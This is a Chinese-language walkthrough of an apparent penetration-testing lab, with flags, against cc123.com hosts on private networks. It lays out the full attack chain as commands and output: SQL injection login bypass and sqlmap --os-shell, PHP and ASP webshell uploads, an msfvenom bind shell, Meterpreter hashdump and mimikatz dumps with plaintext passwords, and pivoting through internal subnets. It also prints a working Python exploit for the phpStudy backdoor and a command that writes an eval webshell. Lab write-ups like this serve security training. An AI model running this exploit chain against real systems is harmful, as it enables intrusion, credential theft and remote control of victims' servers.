目录
测试站点 http://new.cc123.com/member/
1.项目网络拓扑
1.信息收集
netdiscover进行主机发现
sudo netdiscover -i eth0 -r 192.168.3.0/24
端口服务探测
这里使用两款工具一款是nmap
nmap -A 192.168.3.134 -p- -oN nmap.a
kali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.a
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 05:42 EST
Nmap scan report for 192.168.3.134
Host is up (0.00052s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
135/tcp open msrpc Microsoft Windows RPC
999/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: phpMyAdmin
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2021-02-05T10:44:48+00:00; 0s from scanner time.
6588/tcp open http Microsoft IIS httpd 7.5
| http-cookie-flags:
| /:
| ASPSESSIONIDSQSRBBAD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.24 seconds
发现这是一台DNS服务器我跟可以添加本地DNS域名解析指向此服务器。
子域名收集
wfuzz穷举子域名
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
new.cc123.com后台目录扫描
kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://new.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://new.cc123.com
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/05 07:30:44 Starting gobuster
===============================================================
/images (Status: 301)
/news (Status: 301)
/contact (Status: 301)
/about (Status: 301)
/faq (Status: 301)
/help (Status: 301)
/uploads (Status: 301)
/data (Status: 301)
/a (Status: 301)
/Images (Status: 301)
/News (Status: 301)
/member (Status: 301)
/FAQ (Status: 301)
/special (Status: 301)
/m (Status: 301)
/Contact (Status: 301)
/About (Status: 301)
/install (Status: 301)
/Help (Status: 301)
/plus (Status: 301)
/A (Status: 301)
/M (Status: 301)
/include (Status: 301)
/cp (Status: 301)
/NEWS (Status: 301)
/skin (Status: 301)
/case (Status: 301)
/INSTALL (Status: 301)
/CP (Status: 301)
/IMAGES (Status: 301)
/Data (Status: 301)
/Special (Status: 301)
/Uploads (Status: 301)
/Member (Status: 301)
/Faq (Status: 301)
/Install (Status: 301)
/CONTACT (Status: 301)
/Include (Status: 301)
/ABOUT (Status: 301)
/HELP (Status: 301)
/DATA (Status: 301)
/CASE (Status: 301)
/Skin (Status: 301)
/Case (Status: 301)
===============================================================
2021/02/05 07:31:13 Finished
===============================================================
可以参考百度得目录结构
ww2.cc123.com目录扫描
2.漏洞利用
测试站点 http://new.cc123.com/member/
添加分类进行sql注入
这里MD5很明显多了一位 因为MD5加密后是32位为双数位
812df726be884ddcfc41 admin7788
这里我们登入后台
这里我们上传PHP一句话获取webshell
蚁剑连接无法执行命令
我们在次上传asp大马和asp脚本进行扫描可写目录
MSF生成shell脚本上传进行反弹shell
MSF提权
检测提权漏洞
meterpreter >
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
shell
chcp 65001 //解决编码问题
flag1
flag2
测试站点 ww2.cc123.com
kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://ww2.cc123.com
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: aspx,html
[+] Timeout: 10s
===============================================================
2021/02/05 08:50:39 Starting gobuster
===============================================================
/admin (Status: 301)
/index.aspx (Status: 200)
/index.html (Status: 200)
/product.aspx (Status: 200)
/product.html (Status: 200)
/News.aspx (Status: 200)
/News.html (Status: 200)
/template (Status: 301)
/About.aspx (Status: 200)
/About.html (Status: 200)
/Index.aspx (Status: 200)
/Index.html (Status: 200)
/style (Status: 301)
/about.aspx (Status: 200)
/about.html (Status: 200)
[ERROR] 2021/02/05 08:50:58 [!] Get http://ww2.cc123.com/messages.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/editor (Status: 301)
/message.aspx (Status: 200)
/message.html (Status: 200)
/stat.aspx (Status: 200)
/NEWS.aspx (Status: 200)
/NEWS.html (Status: 200)
/index_html (Status: 200)
/index_html.aspx (Status: 200)
/index_html.html (Status: 200)
[ERROR] 2021/02/05 08:51:09 [!] Get http://ww2.cc123.com/Product.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/news2.html (Status: 200)
/news1.html (Status: 200)
/uc (Status: 301)
/INDEX.aspx (Status: 200)
/INDEX.html (Status: 200)
/Admin (Status: 301)
/Template (Status: 301)
/news3.html (Status: 200)
/about1.html (Status: 200)
/news01.html (Status: 200)
/Message.aspx (Status: 200)
/Message.html (Status: 200)
/about2.html (Status: 200)
/Style (Status: 301)
/news11.html (Status: 200)
/news4.html (Status: 200)
/news03.html (Status: 200)
/news5.html (Status: 200)
/upimg (Status: 301)
/Messages.html (Status: 200)
/news06.html (Status: 200)
/news02.html (Status: 200)
/news04.html (Status: 200)
/news12.html (Status: 200)
/about3.html (Status: 200)
/news10.html (Status: 200)
/news16.html (Status: 200)
/product1.html (Status: 200)
/news8.html (Status: 200)
/news17.html (Status: 200)
/news15.html (Status: 200)
/news9.html (Status: 200)
/STYLE (Status: 301)
/news23.html (Status: 200)
/news7.html (Status: 200)
/news13.html (Status: 200)
/news05.html (Status: 200)
/News2.html (Status: 200)
/news6.html (Status: 200)
/news20.html (Status: 200)
/news21.html (Status: 200)
/news14.html (Status: 200)
/news25.html (Status: 200)
/Editor (Status: 301)
/product3.html (Status: 200)
/product2.html (Status: 200)
/ABOUT.aspx (Status: 200)
/ABOUT.html (Status: 200)
/UC (Status: 301)
/news18.html (Status: 200)
/news19.html (Status: 200)
/PRODUCT.aspx (Status: 200)
/PRODUCT.html (Status: 200)
/news22.html (Status: 200)
/news28.html (Status: 200)
/News1.html (Status: 200)
/news003.html (Status: 200)
/about4.html (Status: 200)
/news001.html (Status: 200)
/news48.html (Status: 200)
/news30.html (Status: 200)
/news26.html (Status: 200)
/product02.html (Status: 200)
/news55.html (Status: 200)
/news07.html (Status: 200)
/news09.html (Status: 200)
/news29.html (Status: 200)
/TEMPLATE (Status: 301)
===============================================================
2021/02/05 09:01:13 Finished
===============================================================
后台管理界面登陆框存在SQL注入可绕过密码匹配带入到数据库进行查询
可能是通过sql查询方法进行登录验证。
select * from user where username = 'admin'--+' and password = *****
后台界面修改信息传参处出现sql注入。
sqlmap -r sqlpost.txt --batch
获取sqlmap获取shell
sudo sqlmap -r sqlpost.txt mssql -v 1 --dbs
sudo sqlmap -r sqlpost.txt mssql -v 1 --os-shell
这里我们看到IP为10.10.1.128证明这台机器为内网得数据库服务器,web站点和数据库分离的形式。
获取flag3
.net代码审计
meterpreter > download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin
3.内网渗透
内网信息收集
网卡信息
ipconfig
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:71:98:af
MTU : 1500
IPv4 Address : 192.168.3.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c1e2:d216:9dad:969b
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:386
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 13
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:71:98:b9
MTU : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c1c:e958:d8c2:1189
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 14
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
两个网卡分别对应两个ip
192.168.3.134 / 10.10.10.135
路由信息
meterpreter > run get_local_subnets
两个网段
哈希获取
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
使用mimikatz获取明文
migrate 1500
先进行进程前移,防止之后的mimikatz获取密码发生一些错误。
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg
0;6131477 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;14708785 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
0;8663175 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
0;771729 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
添加路由
run autoroute -s 10.10.10.0/24
探测内网存活主机
MSF内网主机探测
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
端口扫描
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.135
msf5 auxiliary(scanner/portscan/tcp) > exploit
[+] 10.10.10.135: - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135: - Caught interrupt from the console...
[*] Auxiliary module execution completed
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
[*] Running module against WIN-KALKEMT3JMA
[*] ARP Scanning 10.10.10.0/24
[+] IP: 10.10.10.1 MAC 00:50:56:c0:00:13 (VMware, Inc.)
[+] IP: 10.10.10.135 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
[+] IP: 10.10.10.136 MAC 00:0c:29:43:9b:46 (VMware, Inc.)
[+] IP: 10.10.10.254 MAC 00:50:56:eb:d5:a8 (VMware, Inc.)
[+] IP: 10.10.10.255 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
meterpreter > background
[*] Backgrounding session 2...
msf5 auxiliary(scanner/portscan/tcp) > exploit
[+] 10.10.10.135: - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135: - Caught interrupt from the console...
[*] Auxiliary module execution completed
启动socks代理
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run
nmap代理扫描
sudo vim /etc/proxychains.conf
sudo proxychains nmap -sT -Pn 10.10.10.136
Nmap scan report for 10.10.10.136
Host is up (1.1s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 1066.56 seconds
我们的sqlmap获取的shell不是交互式shell我们通过之前的aspx大马连接数据库上传一个正向shell进行连接
查看Web.config文件获取账号密码
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />
msf生成正向的shell
msfvenom -p windows/meterpreter/bind_tcp lport=54321 -f exe>shell.exe
上传正向shell执行命令
MSF监听正向shell
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.136
set lport 54321
run
数据库服务器信息收集
hash收集
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mimikatz抓取密码
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[2] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
IPv4 Address : 10.10.1.128
IPv4 Netmask : 255.255.255.0
IPv4 Address : 10.10.10.136
IPv4 Netmask : 255.255.255.0Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 10.10.10.0/255.255.255.0
内网主机扫描
run autoroute -s 10.10.1.0/24
run post/windows/gather/arp_scanner rhosts=10.10.1.0/24
目标 IP 10.10.1.129
端口扫描
[+] 10.10.1.129: - 10.10.1.129:80 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:135 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:139 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:445 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:3306 - TCP OPEN
代理访问10.10.1.129:80
proxychains firefox http://10.10.1.129
phpstuday后门利用
编写python后门利用脚本
#conding:utf-8
import requests
import sys
import base64
shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))
header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
def exploit(url):
html = requests.get(url=url,headers=header).text
return html
url = "http://10.10.1.129/"
print(exploit(url))
写入PHP一句话
proxychains python3 ./phpstudayexp.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
使用蚁剑代理连接php一句话
更改proxychains代理ip
要在 kali 的 /etc/proxychains.conf把 127.0.0.1 改成 kali 的 ip 不然物理机代理会失败
上传msf正向shell
内网目标机器信息收集
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : target
BootKey : 317aebcebbff049827a6e7f1c7c8bc2eRid : 500
User : Administrator
LM :
NTLM : 15132c3d36a7e5d7905e02b478979046Rid : 501
User : Guest
LM :
NTLM :
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }